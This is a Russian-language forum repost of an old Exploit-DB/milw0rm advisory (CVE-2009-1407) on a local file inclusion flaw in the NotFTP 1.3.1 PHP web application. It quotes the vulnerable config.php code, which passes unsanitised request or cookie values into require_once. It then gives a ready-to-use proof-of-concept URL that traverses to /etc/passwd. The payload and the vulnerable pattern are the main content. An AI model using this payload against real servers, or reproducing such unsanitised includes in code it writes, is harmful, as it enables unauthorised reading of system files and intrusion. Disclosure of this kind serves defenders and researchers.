- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8504
- Проверка EDB
-
- Пройдено
- Автор
- KACPER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-1407
- Дата публикации
- 2009-04-21
Код:
NotFTP 1.3.1 => Local file include
http://sourceforge.net/projects/notftp/
Author: Kacper
Email: kacper1964@yahoo.pl
Home: http://devilteam.pl/
DC++ Hub address: bluber-hub.no-ip.biz:2008
Vuln:
File config.php:
#########################################################################
# This is where we decide what language to use. Don't mess with this
# either.
#########################################################################
if (isset($newlang))
{
require_once("lib/lang/".$languages[$newlang]["file"]);
}
elseif (isset($_COOKIE["notftplang"]))
{
require_once("lib/lang/".$languages[$_COOKIE["notftplang"]]["file"]);
}
else
{
require_once("lib/lang/".$languages[DEFAULTLANG]["file"]);
}
# NotFTP version. Changing this would be silly. So don't.
PoC:
http://site.pl/path/config.php?newlang=kacper&languages[kacper][file]=../../../../../etc/passwd
The End
=========
# milw0rm.com [2009-04-21]- Источник
- www.exploit-db.com
